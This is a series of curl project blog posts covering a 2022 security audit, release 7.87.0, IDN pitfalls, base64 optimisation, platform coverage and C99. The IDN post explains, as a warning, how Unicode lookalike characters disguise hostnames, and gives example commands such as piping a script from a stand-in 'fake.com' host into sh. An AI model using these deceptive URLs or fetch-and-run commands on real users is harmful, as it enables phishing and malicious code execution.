The 2022 curl security audit

tldr: several hundred hours of dedicated scrutinizing of curl by a team of security experts resulted in two CVEs and a set of less serious remarks. The link to the reports is at the bottom of this article.

Thanks to an OpenSSF grant, OSTIF helped us set up a curl security audit, which the excellent Trail of Bits was selected to perform in September 2022. We are most grateful to OpenSSF for doing this for us, and I hope all users who use and rely on curl recognize this extraordinary gift. OSTIF and Trail of Bits both posted articles about this audit separately.

We previously had an audit performed on curl back in 2016 by Cure53 (sponsored by Mozilla) but I like to think that we (curl) have traveled quite far and matured a lot since those days. The fixes from the discoveries reported in that old previous audit were all merged and shipped in the 7.51.0 release, in November 2016. Now over six years ago.

Changes since previous audit

We have done a lot in the project that have improved our general security situation over the last six years. I believe we are in a much better place than the last time around. But we have also grown and developed a lot more features since then.

curl is now at150,000 lines of C code. This count is for “product code” only and excludes blank lines but includes 19% comments.

71 additional vulnerabilities have been reported and fixed since then. (42 of those even existed in the version that was audited in 2016 but were obviously not detected)

We have 30,000 additional lines of code today (+27%), and we have done over 8,000 commits since.

We have 50% more test cases (now 1550).

We have done 47 releases featuring more than 4,200 documented bugfixes and 150 changes/new features.

We have 25 times the number of CI jobs: up from 5 in 2016 to 127 today.

The OSS-Fuzz project started fuzzing curl in 2017, and it has been fuzzing curl non-stop since.

We introduced our “dynbuf” system internally in 2020 for managing growing buffers to maybe avoid common C mistakes around those.

Audit

The Trail of Bits team was assigned this as a three-part project:

  1. Create a Threat Model document
  2. Testing Analysis and Improvements
  3. Secure code Review

The project was setup to use a total of 380 man hours and most of the time two Trail of Bits engineers worked in parallel on the different tasks. The Trail of Bits team themselves eventually also voluntarily extended the program with about a week. They had no problems finding people who wanted to join in and look into curl. We can safely say that they spent a significant amount of time and effort scrutinizing curl.

The curl security team members had frequent status meetings and assisted with details and could help answer questions. We would also get updates and reports on how they progressed.

Two security vulnerabilities were confirmed

The first vulnerability they found ended up known as the CVE-2022-42915: HTTP proxy double-free issue.

The second vulnerability was found after Trail of Bits had actually ended their work and their report, while they were still running a fuzzer that triggered a separate flaw. This second vulnerability is not covered in the report but was disclosed earlier today in sync with the curl 7.87.0 release announcement: CVE-2022-43552: HTTP Proxy deny use-after-free.

Minor frictions detected

Discoveries and remarks highlighted through their work that were not consider security sensitive we could handle on the fly. Some examples include:

  • Using --ssl now outputs a warning saying it is unsafe and instead recommending --ssl-reqd to be used.
  • The Alt-svc: header parser did not deal with illegal port numbers correctly
  • The URL parser accepted “illegal” characters in the host name part.
  • Harmless memory leaks

You should of course read the full reports to learn about all the twenty something issues with all details, including feedback from the curl security team.

Actions

The curl team acted on all reported issues that we think we could act on. We disagree with the Trail of Bits team on a few issues and there are some that are “good ideas” that we should probably work on getting addressed going forward but that can’t be fixed immediately – but also don’t leave any immediate problem or danger in the code.

Conclusions

Security is not something that can be checked off as done once and for all nor can it ever be considered complete. It is a process that needs to blend in and affect everything we do when we develop software. Now and forever going forward.

This team of security professionals spent more time and effort in this security auditing and poking on curl with fuzzers than probably anyone else has ever done before. Personally, I am thrilled that they only managed to uncovered two actual security problems. I think this shows that a lot of curl code has been written the right way. The CVEs they found were not even that terrible.

Lessons

Twenty something issues were detected, and while the report includes advice from the auditors on how we should improve things going forward, they are of the kind we all already know we should do and paths we should follow. I could not really find any real lessons as in obvious things or patterns we should stop or new paradigms och styles to adapt.

I think we learned or more correctly we got these things reconfirmed:

  • we seem to be doing things mostly correct
  • we can and should do more and better fuzzing
  • adding more tests to increase coverage is good

Security is hard

To show how hard security can be, we received no less than three additional security reports to the project during the actual life-time when this audit was being done. Those additional security reports of course came from other people and identified security problems this team of experts did not find.

My comments on the reports

The term Unresolved is used for a few issues in the report and I have a minor qualm with the use of that particular word in this context for all cases. While it is correct that we in several cases did not act on the advice in the report, we saw some cases where we distinctly disagree with the recommendations and some issues that mentioned things we might work on and address in the future. They are all just marked as unresolved in the reports, but they are not all unresolved to us in the curl project.

In particular I am not overly pleased with how the issue called TOB-CURLTM-6 is labeled severity high and status unresolved as I believe this wrongly gives the impression that curl has issues with high severity left unresolved in the code.

If you want to read the specific responses for each and every reported issue from the curl project, they are stored in this separate GitHub gist.

The reports

You find the two reports linked to from the curl security page. A total of almost 100 pages in two PDF documents.

curl 7.87.0

Numbers

the 212th release
5 changes
56 days (total: 9,042)

155 bug-fixes (total: 8,492)
238 commits (total: 29,571)
0 new public libcurl function (total: 91)
2 new curl_easy_setopt() option (total: 302)

1 new curl command line option (total: 249)
83 contributors, 40 new (total: 2,771)
42 authors, 20 new (total: 1,101)
2 security fixes (total: 132)
Bug Bounties total: 48,580 USD

Release presentation

At 10:00 CET (9:00 UTC) on December 21, Daniel live-streams the release presentation on twitch. This paragraph will later be replaced by a link to the YouTube version of that video.

Security

Two security advisories this time around, severity low and medium.

CVE-2022-43551: Another HSTS bypass via IDN

The HSTS logic could be bypassed if the host name in the given URL first uses IDN characters that get replaced to ASCII counterparts as part of the IDN conversion. Like using the character UTF-8 U+3002 (IDEOGRAPHIC FULL STOP) instead of the common ASCII full stop (U+002E). Then in a subsequent request, it does not detect the HSTS state and makes a clear text transfer. Because it would store the info IDN encoded but look for it IDN decoded.

CVE-2022-43552: HTTP Proxy deny use-after-free

When an HTTP PROXY denied to tunnel SMB or TELNET, curl would use a heap-allocated struct after it had been freed in its transfer shutdown code path.

Changes

–url-query

curl’s 249th command line option adds data to the query part of the URL.

CURLOPT_QUICK_EXIT

Tell libcurl to not wait for any DNS threads on exit.

CURL_WRITEFUNC_ERROR

New and easier way to signal write callback errors.

CURLOPT_CA_CACHE_TIMEOUT

libcurl can now cache the CA store in memory, as I blogged about separately.

feature names added to curl_version_info_data

The struct returned by curl_version_info now returns all built-in features listed by name. This is a preparation to allow applications to adapt slowly and get ready for the future moment when the features can no longer fit in in the 32 bit fields previously used for this purpose.

Bugfixes

Better base64

The encoder now allocates the output using a more appropriate size, and both the encoder and decoder implementations are much faster.

hyper

We fixed a few issues in the hyper backend and are down to just 12 remaining disabled tests to address.

gen.pl: fix the linkifier

This script generates the curl.1 man page and make sure to properly mark references correctly, so that the man page can get rendered as we webpage with correct links etc on the website. This time we made it work better and therefore more cross-references in the man page is now linked correctly in the web version.

tool: override the numeric locale and set “C” by force

In previous curl versions it mistakenly used the locale when parsing floating point numbers, which then made the tool hard to use in scripts which would run in multiple locales. An example is the timeout option specified with -m / --max-time as number of seconds with a fraction. Now it requires the decimal separator to always be a dot/period independently of the user’s locale.

tool: timeout in the read callback

The command line tool can now timeout reading data better, for example when using telnet:// with a timeout option and the user does not press any key and nothing happens over the network.

curl_get_line: allow last line without newline char

Because of a somewhat lazy recent fix, the .netrc parsed and other users of the nternal curl_get_line() function would ignore the last line if it did not end with a newline. This is no more.

support growing FTP files with CURLOPT_IGNORE_CONTENT_LENGTH

If this option is set, also known as --ignore-content-length on the command line, curl will not complain if the size grows from the moment the FTP transfer starts until it ends. Thus allowing it to grow while being transferred.

do not send PROXY more than once

The HAproxy protocol line could get sent more than once and thus break stuff.

feature deprecation warnings in gcc

A number of outdated libcurl options and functions are now tagged as deprecated, which will cause compiler warnings when used in application code for users of gcc 6.1 or later. Deprecated here means that we recommend using other, more modern, alternatives.

parse numbers with fixed known base 10

In several places in curl and libcurl source code we would allow numbers to be specified using octal or hexadecimal while decimal was the only expected and documented base. In order to minimize surprises and for consistency, we now limited them as far as possible to only accepting decimal numbers.

rewind BEFORE request instead of AFTER previous

When curl is used to send a request, for example a POST, and there is reason for it to send it again, like if there is a redirect or an ongoing authentication process, it would previously rewind the stream at the end of that transfer first transfer in order to have it done when the next transfer is about to get done. Now, it instead does the rewind first in the second request. This, because there are times when the second request are not done, and the rewind may not work. So, such a failing rewind can be avoided by not doing it until it is strictly necessary.

noproxy

Several independent regressions were fixed – in spite of the new set of test cases added for testing this feature in the previous release. Noproxy is the support for the NO_PROXY environment variable and related options.

openssl: prefix errors with ‘[lib]/[version]:’

To help users understand errors and their origins a little better, libcurl will now prefix error messages originating from OpenSSL (and forks) with the name of the flavor and its version number.

RTSP auth works again

This functionality was broken a few versions back and now it has finally been fixed again.

runtests: –no-debuginfod now disables DEBUGINFOD_URLS

valgrind and gdb support downloading stuff at the moment of need if this environment variable is set. Previously the curl test running script would unset that variable unconditionally, but now it will not and instead offer an option that unsets it – for the cases where the environment variable causes problems (such as performance slowdowns).

HTTP/3 tests

We finally have the first infrastructure merged for doing and running HTTP/3 specific tests in the curl test suite. Now we can better avoid regressions going forward. This is only the beginning and I expect us to expand and grow these tests going forward.

determine the correct fopen option for -D

When saving response headers into a dedicated file with curl’s -D, –dump-header option, curl would be inconsistent about when to create a new file and when to append do it. Now it acts exactly as documented.

better error message for -G with bad URL

Several users figured out curl showed misleading error messages when -G was used in combination with a malformed URL. This is now improved.

repair IDN for proxies

A recent fix we landed for IDN for host names accidentally simultaneously broke it for proxies…

cmake: set the soname on the shared library

Using cmake to build libcurl as a shared library on Linux and several other systems, will now set the SONAME number correctly in the same style and with the same number that the autotools build uses.

WebSocket polish

  • fixes for partial frames and buffer updates
  • now returns CURLE_NOT_BUILT_IN when websockets support is not built in
  • returns error properly when the connection is closed

TLS goes connection filters => more HTTPS-proxy

As a direct result of the internal refactor and introduction of connection filters also for TLS, curl now supports HTTPS-proxy for a wider selection of TLS backends than previously.

Credits

Release image by @sny@mas.to

curl sighting: Tschugger

In the Swiss crime comedy TV series Tschugger, season two episode two at roughly 25:20, there is a shot with a curl command line in a terminal window using an unnecessary –request option.

Following the curl line is what looks like an interactive login procedure, which certainly is not something a real curl would present. Based on this, I think we need to give this use of curl a fairly low realism score: a 2 out 5.

Trying that displayed command line in a real terminal unfortunately only gives us Could not resolve host: secure.da-34-22.remote.com. I doubt that the TV company actually purchased this domain though. It seems a little too generic.

I have not seen it

I have not been able to view this episode so I cannot yet comment on the conditions and the surroundings for when this snapshot is taken. Once I do, I might be able to extend the description above somewhat.

Credits

First brought to my attention by Cybergossipgirl, who also took the snapshot seen above.

IDN is crazy

IDN, International Domain Names, is the concept that lets us register and use international characters in domain names, and by international we of course mean characters outside of the ASCII range.

Recently I have fought some battles against IDN and IDN decoding so I felt this urge to write a lot of words about it to help me in my healing process and maybe mend my scars a little. I am not sure it worked but at least I feel a little better now.

(If WordPress had a more sensible Unicode handling, this post would have nicer looking examples. I can enter Unicode fine, but if I save the post as a draft and come back to it later, most of the Unicodes are replaced by question marks! Because of this, the examples below are not all using the exact Unicode symbols the text speaks of.)

Punycode

IDN works by having apps convert the Unicode name into the ASCII based punycode version under the hood, and then use that with DNS etc. The puny code version of “räksmörgås.se” becomes “xn--rksmrgs-5wao1o.se“. A pretty clever solution really.

The good side

Using this method, we can use URLs like https://räksmörgås.se or even ones written entirely in Arabic, Chinese or Cyrillic etc in compliant applications like browsers and curl. Even the TLD can be “international”. The whole Unicode range is at our disposal and this is certainly a powerful tool and allows a lot of non-Latin based languages to actually be used for domain names.

Gone are the days when everything needed to be converted to Latin.

There are many ugly sides

Already from the start of the IDN adventure, people realized that Unicode contains a lot of symbols that are identical or almost identical to other symbols, so you can make up the perfect fake sites that provide no or very little visual distinction from the one you try to look like.

Homographs

I remember early demonstrations using paypal.com vs paypal.com, where the second name was actually using a completely different letter somewhere. Perhaps for example the ‘l’ used the Cyrillic Capital Letter Iota (U+A646) – which in most fonts is next to indistinguishable from the lower case ASCII letter L. This is commonly referred to as an IDN Homograph attack. They look identical, but are different.

This concept of replacing one or more characters by identical glyphs is mitigated in part in browsers, which switch to showing the punycode version in the URL bar instead of the Unicode version – when they think it is mandated. Domain names are not allowed to mix scripts for different languages, and if they do the IDNs names are displayed using their punycode.

This of course does not prevent someone from promoting a command line curl use that uses it, and maybe encourage use of it:

curl https://example.com/api/

If you would copy and paste such an example, you would find that curl cannot resolve xn--exampe-7r6v.com! Or if you use the same symbol in the curl domain name:

$ curl https://curl.se
curl: (6) Could not resolve host: xn--cur-ju2l.se

Heterograph?

Similar to the previous confusion, there’s another version of the homograph attack and this is one that stayed under the radar for me for a long time. I suppose we can call it a Heterograph attack, as it makes names look different when they are in fact the same.

The IDN system is also “helpfully” replacing some similarly looking glyphs with their ASCII counterparts. I use quotes around helpfully, because I truly believe that this generally causes more harm and pain in users’ lives than it actually does good.

A user can provide a name using an IDN version of one or more characters within the name, and that name will then get translated into a regular non-IDN name and then get used normally from then on. I realize this may sound complicated, but it really is not.

Let me show you a somewhat crazy example (shown as an image to prevent WordPress from interfering). You want to use a curl command line to get the contents of the URL https://curl.se but since you are wild and crazy, you spice up things and replace every character in the domain name with a Unicode replacement:

If you would copy and paste this command line into your terminal, it works. Everyone can see that this domain name looks crazy, but it does not matter. It still works. It also works in browsers. A browser will however immediately show the translated version in the URL bar.

This method can be used for avoiding filters and has several times been used to find flaws in curl’s HSTS handling. Surely other tools can be tricked and fooled using variations of this as well.

This works because the characters used in the domain name are automatically converted to their ASCII counterparts by the IDN function. And since there is no IDN characters left after the conversion, it does not end up punycoded but instead it is plain old ASCII again. Those Unicode symbols simply translate into “curl.se”.

The example above also replaces the period before “se” with the Halfwidth Ideographic Full Stop (U+FF61).

Replacing the dot this way works as well. “Helpful”.

A large set to pick from

If we look at the letter ‘c’ alone, it has a huge number of variations in the Unicode set that all translate into ASCII ‘c’ by the IDN conversion. I found at least these fifteen variations that all convert to c:

  • Fullwidth Latin Small Letter C (U+FF43)
  • Modifier Letter Small C (U+1D9C)
  • Small Roman Numeral One Hundred (U+217D)
  • Mathematical Bold Small C (U+1D41C)
  • Mathematical Italic Small C (U+1D450)
  • Mathematical Bold Italic Small C (U+1D484)
  • Mathematical Script Small C (U+1D4B8)
  • Mathematical Fraktur Small C (U+1D520)
  • Mathematical Double-Struck Small C (U+1D554)
  • Mathematical Bold Fraktur Small C (U+1D588)
  • Mathematical Sans-Serif Small C (U+1D5BC)
  • Mathematical Sans-Serif Bold Small C (U+1D5F0)
  • Mathematical Sans-Serif Italic Small C (U+1D624)
  • Mathematical Sans-Serif Bold Italic Small C (U+1D658)
  • Mathematical Monospace Small C (U+1D68C)

The Unicode consortium even has this collection of “confusables” which also features a tool that lets you visualize a name done with various combinations of Unicode homographs. I entered curl, and here’s a subset of the alternatives it showed me:

Supposedly, all of those combinations can be used as IDN names and they will work.

Homographic slash

The Fraction Slash (U+2044) looks very much like an ASCII slash, but is not. Use it instead of a slash to make the URL look like host name with a slash, but then add your own domain name after it:

$ curl https://google.com/.curl.se
curl: (6) Could not resolve host: google.xn--com-qt0a.curl.se

If you paste that URL into a browser, it will switch to punycode mode, but still. The next example also shows as punycode when I try it in Firefox.

Homographic question mark

If you want an alternative to the slash-looking non-slash symbol, you can also trick a user with something that looks similar to a question mark. The Latin Capital Letter Glottal Stop (U+0241) for example is a symbol that looks confusingly similar to a question mark in many fonts:

$ curl https://google.com?.curl.se
curl: (6) Could not resolve host: google.xn--com-sqb.curl.se

In both the slash and these question mark examples, I could of course set up a host that would have some clever content.

Homographic fragment

The Viewdata Square (U+2317) can be used to mimic a hash symbol.

$ curl https://trusted.com#.fake.com
curl: (6) Could not resolve host: trusted.xn--com-d62a.fake.com

Percent encode the thing

It can look even weirder if you combine the above tricks and then percent-encode the UTF-8 bytes. This thing below still ends up “https://curl.se”:

$ curl "https://%e2%84%82%e1%b5%a4%e2%93%87%e2%84%92%e3%80%82%f0%9d%90%92%f0%9f%84%b4"

That URL of course also works fine to paste into a browser’s URL bar.

Zero Width space

Unicode offers this fun “symbol” that is literally nothing. It is a zero width space (U+200B). The IDN handling also recognizes this and will remove any such in the process. This means that you can add one or more zero width spaces to any domain in a URL and the domain will still work and end up being the original one. The UTF-8 sequence for this is %e2%80%8b when expressed percent encoded.

Instead of using curl.se you can thus use cu%e2%80%8brl.se. Or even cu%e2%80%8brl.s%e2%80%8be!

$ curl https://cu%e2%80%8brl.s%e2%80%8be

Tricking a curl user

curl users will not get the punycode version shown in a URL bar so we might be easier to fool by these stunts. If the user doesn’t carefully check perhaps the verbose output, they might very well be fooled.

HTTPS does not save us either, because nothing prevents an impostor from creating this domain name and having a perfectly valid certificate for it.

A really sneaky command line to trick users to download something from a site fake site, while appearing to download from a known and trusted one can look like this:

$ curl https://trusted.com?.fake.com/file -O

… but since the question mark on the right side of ‘com’ is a Unicode symbol, and the curl tool supports IDN, it actually gets a page from “fake.com”, As owner of fake.com, we would only need to make sure that https://trusted.xn--com-qt0a.fake.com exists and works.

A real world attack could even have a redirect to the real trusted.com domain for 99% of the cases or maybe for all cases where the user agent or source IP are not the ones we are looking for.

The old pipe from curl to shell thing is of course also an effective trick. It looks like you get the script from trusted.com using HTTPS and everything:

$ curl https://trusted.com?.fake.com/script | sh

More

This blog post is not meant to be a conclusive list of all problems or possible IDN trickery you can play with. I hear for example that mixing right-to-left with left-to-right in the same domain name is another treasure trove of confusions ready for your further explorations.

Game on!

Mitigations

People have mentioned it as comments to this: all registrars may not allow you to register domains containing specific Unicode symbols. In the past we have however seen that some TLDs are more liberal. Also, what I mention above are mostly tricks you can do without registering a new domain.

ICANN presumably has rules against use of emojis etc when creating new TLDs.

Discuss

Hacker news.

curl sighting: Silk Road

In the 2021 movie Silk Road, at around 19:23-19:26 into the film we can see Ross Ulbricht, the lead character, write a program on his laptop that uses curl. A few seconds we get a look at the screen as Ross types on the keyboard and explains to the female character who says I didn’t know you know how to code that he’s teaching himself to write code.

The code

Let’s take a look at the code on the screen. This is PHP code using the well known PHP/CURL binding. The URL on the screen on line two has really bad contrast, but I believe this is what it says:

<?php
  $ch = curl_init("http://silkroadvb5pzir.onion");
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_PROXY,                
              "http://127.0.0.1:9050/");
  curl_setopt($ch, CURLOPT_PROXYTYPE, 7);
  $output = curl_exec($ch);
  $curl_error = curl_error($ch);
  curl_cl

.onion is a TLD for websites on Tor so this seems legit as it a URL for this purpose could look like this. But then Ross confuses matters a little. He uses two curl_init() calls, one that sets a URL and then again a call without a URL. He could just have removed line three and four. This doesn’t prohibit the code from working, it just wouldn’t have passed a review.

The code then sets a proxy to use for the transfer, specified as an HTTP URL which is a little odd since the proxy type he then sets on the line below is 7, the number corresponding to CURLPROXY_SOCKS5_HOSTNAME – so not a HTTP proxy at all but a SOCKS5 proxy. The typical way you access Tor: as a SOCKS5 proxy to which you pass the host name, as opposed to resolving the host name locally.

The last line is incomplete but should ultimately be curl_close($ch); to close the handle after use.

All in all a seemingly credible piece of code, especially if we consider it as a work in progress code. The minor mistakes would be soon be fixed.

Credits

Viktor Szakats spotted this and sent me the screenshot above. Thanks!

Faster base64 in curl

This adventure started with an issue where a user pointed out that the libcurl function for base64 encoding actually would allocate a few bytes too many at times.

That turned out to be true and we fixed it fairly quickly.

As I glanced at that base64 encoder function that was still loaded and showing in my editor window, it struck me that it really was not written in an optimal way.

Base64 encoding

This “encoding” converts 8 bit data into a 6 bit data, where each 6 bit combination has a dedicated ASCII character. It uses these 64 different characters: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/.

Three 8-bit bytes make up 24 bit of data, which can be represented by four 6-bit symbols. Like this: the example byte sequence 0x12 , 0x34 and 0x56 creates the 24 bit value 0x123456. Shown in binary it looks like: 000100100 0110100 01010110

That 24 bit number is split into 6-bit chunks: 000100, 100011, 010001 and 010110. Written in decimal, they are 4, 35, 17 and 22. Pick the corresponding symbols from those indexes in the base64 table shown above and they make the base64 encoded sequence: EjRW. And so on.

That’s base 64 encoding.

A realization

The base64 encoder function source code I looked at, was introduced in curl in the late 1990s and existed in the first commit we have saved. It has remained mostly intact since. Over twenty two years old.

This is how the code used to look. Fairly readable, but with a lot of conditions and perhaps most importantly, with calls to msnprintf() to output data. msnprintf() is our internal snprintf implementation,

The old base64 encoder

while(insize > 0) {
  for(i = inputparts = 0; i < 3; i++) {
    if(insize > 0 {
     inputparts++;
     ibuf[i] = (unsigned char) *indata;
     indata++;
     insize--;
   }
   else
     ibuf[i] = 0;
  }

  obuf[0] = ((ibuf[0] & 0xFC) >> 2);
  obuf[1] = (((ibuf[0] & 0x03) << 4) |
            ((ibuf[1] & 0xF0) >> 4));
  obuf[2] = (((ibuf[1] & 0x0F) << 2) |
            ((ibuf[2] & 0xC0) >> 6));
  obuf[3] = (ibuf[2] & 0x3F);

  switch(inputparts) {
  case 1: /* only one byte read */
    i = msnprintf(output, 5, "%c%c%s%s",
                  table64[obuf[0]],
                  table64[obuf[1]],
                  padstr,
                  padstr);
    break;

  case 2: /* two bytes read */
    i = msnprintf(output, 5, "%c%c%c%s",
                  table64[obuf[0]],
                  table64[obuf[1]],
                  table64[obuf[2]],
                  padstr);
    break;

  default:
    i = msnprintf(output, 5, "%c%c%c%c",
                  table64[obuf[0]],
                  table64[obuf[1]],
                  table64[obuf[2]],
                  table64[obuf[3]]);
    break;
  }
  output += i;

}

(The padstr variable in there is for handling the mode where it does not output any final = padding characters. )

Improving

I started out by writing a test program. I created a huge string, and made the test program base64-encode a part of that string. Starting from one byte string, then increasing the length one by one to iterating over all sizes until the final size which happened to be 106128 bytes. Maybe not the most realistic test in the world, but at least it does a lot of base64 encoding. The base64 encode algorithm is also content agnostic so it doesn’t matter what the exact content is, the size of it is the main thing.

My first casual attempt that only replaced the snprintf() calls with direct assigns into the target buffer first made me doubt my numbers or test program. My test program ran 14 times faster.

Motivated by the enormous performance gain seen with that minor change, I continued. I removed the use of the obuf array and it occurred to me I should deal with the encoding in two phases; one main one for all complete three-byte triplets and then do the padding final chunk separately – as then we can avoid conditions in the main loop.

The final result that I ended up merging showed an almost 29 times improvement. With the old code the test program took six minutes to complete, the new one finished in twelve seconds.

The new encoder

  while(insize >= 3) {
    *output++ = table64[ in[0] >> 2 ];
    *output++ = table64[ ((in[0] & 0x03) << 4) |
                         (in[1] >> 4) ];
    *output++ = table64[ ((in[1] & 0x0F) << 2) | 
                         ((in[2] & 0xC0) >> 6) ];
    *output++ = table64[ in[2] & 0x3F ];
    insize -= 3;
    in += 3;
  }
  if(insize) {
    /* this is only one or two bytes now */
    *output++ = table64[ in[0] >> 2 ];
    if(insize == 1) {
      *output++ = table64[(in[0] & 0x03) << 4];
      if(*padstr) {
        *output++ = *padstr;
        *output++ = *padstr;
      }
    }
    else {
      /* insize == 2 */
      *output++ = table64[((in[0] & 0x03) << 4) |
                          ((in[1] & 0xF0) >> 4)];
      *output++ = table64[(in[1] & 0x0F) << 2];
      if(*padstr)
        *output++ = *padstr;
    }
  }

I think the new version still is highly readable, and it actually is significantly smaller in size than the previous version!

Base64 decoding

Energized by that fascinating improvement I managed to do to the encoder function, I turned my eyes to the base64 decoder function. This function is slightly newer in curl than the encoder, but still traces back to 2001 and it too was never improved much after its initial merge.

I started again by writing another test program. This one creates a 2948 bytes base64 encoded string which the application then iterates over and decodes pieces of. From one byte up to the full size, and then it loops so that it repeats that procedure a thousand times.

When decoding base64, the core of the code needs to find out what binary number each particular input octet represents. ‘A’ is zero, ‘B’ is one etc. Then it needs to take four such consecutive (effectively 6 bit) letters at a time and output 3 eight bit bytes. Over and over. In a final round it might need to deal with =-padding to make it an even 4 bytes size.

The old decoder

This is how the old decodeQuantum function looked like. It decodes a 4-letter sequence into three output bytes.

  for(i = 0, s = src; i < 4; i++, s++) {
    if(*s == '=') {
      x <<= 6;
      padding++;
    }
    else {
      const char *p = strchr(base64, *s);
      if(p)
        x = (x << 6) + curlx_uztoul(p - base64);
      else
        return 0;
    }
  }

  if(padding < 1)
    dest[2] = curlx_ultouc(x & 0xFFUL);

  x >>= 8;
  if(padding < 2)
    dest[1] = curlx_ultouc(x & 0xFFUL);

  x >>= 8;
  dest[0] = curlx_ultouc(x & 0xFFUL);

The new decoder

What immediately sticks out in the old code is the use of strchr() to find the letters’ offset in the base64 table as a means to figure out its byte value. The larger the value, the longer the function needs to search through the string to find it. And it needs to search for every single byte used in the input string.

What if we could replace the search by a lookup table instead?

My updated code features a lookup table for each input byte, and in similar fashion to how the encoder logic works, it now separates the final padding step in a separate extra block in the end to avoid extra conditions in the main loop.

With the simplified quad decoder, I put the whole thing in the same loop. Unfortunately I could not think of a way to avoid the check for invalid characters in the loop.

It turns out this new base64 decoder is about 4.5 times faster than the previous code!

  for(i = 0; i < fullQuantums; i++) {
    unsigned char val;
    unsigned int x = 0;
    int j;

    for(j = 0; j < 4; j++) {
      val = lookup[(unsigned char)*src++];
      if(val == 0xff) /* bad symbol */
        goto bad;
      x = (x << 6) | val;
    }
    pos[2] = x & 0xff;
    pos[1] = (x >> 8) & 0xff;
    pos[0] = (x >> 16) & 0xff;
    pos += 3;
  }

Final words

I wrote my test applications to measure the impact of my changes. We could argue if they show real world use cases or not but I think they at still prove that my changes were good and made the functions faster. The exact numbers are not that important.

The exact performance numbers I mention in this blog post are based on results that I saw on my old Intel-based development machine as the best result of at least three consecutive runs. Other systems and architectures will for sure show different numbers.

Base64 encoding and decoding are not significant functions, and are not even very frequently called ones, in curl. These improvements are not likely to even be noticeable to curl or libcurl users. I still consider these optimizations worthwhile because why not do things as fast as you can if you are going to them anyway. As long as there’s no particular penalty involved.

The changes I did for the base64 handling were done entirely without changing the behavior or function prototypes in order to compartmentalize them and keep them constrained.

Credits

Image by DrZoltan from Pixabay

Discussed

On Hacker news, Reddit and lobste.rs

89 operating systems

I occasionally do talks about curl. In these talks I often include a few slides that say something abut curl’s coverage and presence on different platforms. Mostly to boast of course, but also to help explain to the audience how curl has manged to reach its ten billion installations.

This is current incarnation of those seven slides in November 2022. I am of course also eager to get your feedback on the specific contents, especially if you miss details in them, that I should add so that my future curl presentations include more accurate data.

curl runs in all your devices

curl is used in (almost) every Internet-connected device out there, and I try to visualize that with this packed slide. Cars, servers, game consoles, medical devices, games, apps, operating systems, watches, robots, TVs, speakers, light-bulbs, freezers, printers, motorcycles, music instruments and more.

The intent being to show with images that it runs in quite a few devices.

28 transfer protocols

More strictly speaking these are the 28 URL schemes curl supports right now, including in experimental builds. The image tries to put them in a sort of hierarchical way so that you can see what underlying protocol that is used for them: TCP, SSH, TLS, QUIC etc.

60 bindings

Volunteers have created and maintain libcurl bindings for at least these 60 different environments, making it possible for developers to access and use libcurl powers from virtually every programming language you can think of.

37 third party dependencies

curl’s modular design and ability letting the developer who builds curl to mix and match features and what particular third party dependencies to use, makes it possible to craft exactly the curl builds you want. Device manufacturers get the combination they like for exactly their purposes and needs.

89 operating systems

This list has been worked on and bounced around several times between friends and it always brings out a few questions and people like to argue with me about a few entries I include and about a few entries I do not include. The problem is both that there is not a clear defining line between the definition of an operating systems and a distribution or a different running environment and sometimes it is just branding differences separating X from Y. With a “flexible” attitude to the definition of operating systems, this is the current collection of no less than 89 individual ones on which curl runs or has run on:

24 CPU architectures

Older versions of this slide used to have x86-64 as a separate one, but I think we have concluded that a large amount of the architectures have separate 64 bit versions so if I were to keep x86-64 I should also include a lot of other 64 bit versions so I removed the x86-64 from the slide. Maybe I should rather go the other way and add all the 64 bit version as separate architectures?

Anyway, curl has been made to run on virtually all modern or semi-modern 32 bit or larger CPU architectures we can find:

2 planets

I admit it. I include this slide in my presentation and in this blog post because it feels like the ultimate show-off. curl was used in the mars 2020 helicopter mission.

Considering C99 for curl

tldr: we stick to C89 for now.

The curl project builds on foundations that started in late 1996 with the tool named httpget.

ANSI C became known as C89

In 1996 there were not too many good alternatives for making a small and efficient command line tool for doing Internet transfers. I am not saying that C was the only available language, but for me the choice was easy and frankly I did not even think about any other languages when this journey started. We called the C flavor “ANSI C” back then, as compared to the K&R “old style” C. The ANSI C version would later be renamed to C89 (confusingly enough it is also sometimes known as C90).

In the year 2000 we introduced libcurl, the library that provides Internet transfer super powers to whoever wants it. This made the choice of using C even better. C made it possible for us to provide a stable API/ABI without problems – something not even C++ could offer at the time. It was also a reasonably portable language that made it possible for us to bring curl and libcurl to virtually all modern operating systems.

As I wanted curl and libcurl to be system level options and I aimed for the widest possible adoption, they could not be written in any of the higher level languages like Perl, Python or similar. That would make them too big and require too much “extra baggage”.

I am convinced that the use of (conservative) C for curl is a key factor to its success and its ability to get used “everywhere”.

C99

C99 was published in (surprise!) 1999 but the adoption in compilers took a long time and it remained a blocker for adoption for us. We want curl available “everywhere” so as long some of the major compilers did not support C99 we did not even consider switching C flavor, as it would risk hamper curl adoption.

The slowest of the “big compilers” to adopt C99 was the Microsoft Visual C++ compiler, which did not adopt it properly until 2015 and added more compliance in 2019. A large number of our users/developers are still stuck on older MSVC versions so not even all users of this compiler suite can build C99 programs even today, in late 2022.

C11, C17 and beyond

Meanwhile, the ISO C Working Group continue to crank out updates to the C language. C11 shipped, C17 came and now they are working on the C2x pending version, presumed to end up called C23.

Bump the requirement for curl?

We are aware that other widely popular C projects are moving forward and have raised their requirements to C99 or beyond. Like the Linux kernel, the git project and more.

The discussion about bumping C flavor has been brought up on the libcurl mailing list as well, in particular as we are already planning a version 8 release to happen in the spring of 2023 so in theory it could be a good moment to make some changes like this.

What C99 features would improve a project like curl? The most interesting parts of C99 that could impact curl code that I could think of are:

  • // comments
  • __func__ predefined identifer
  • boolean type in <stdbool.h>
  • designated struct initializers
  • empty macro arguments
  • extended integer types in <inttypes.h> and <stdint.h>
  • flexible array members (zero size arrays)
  • inline functions
  • integer constant type rules
  • mixed declarations and code
  • the long long type and library functions
  • the snprintf() family of functions
  • trailing comma allowed in enum declaration
  • vararg macros
  • variable-length arrays

So sure, there are lots of cool things we could use. But do we need them?

For several of the features above, we already have decent and functional replacements. Several of the features don’t matter. The rest risk becoming distractions.

Opening up for C99 without conditions in curl code would risk opening the flood gates for people rewriting things, so we would have to go gently and open up for allowing new C99 features slowly. That is also how the git project does it. A challenge with that approach, is that it is hard to verify which features that are allowed vs used as existing tooling normally don’t have that resolution.

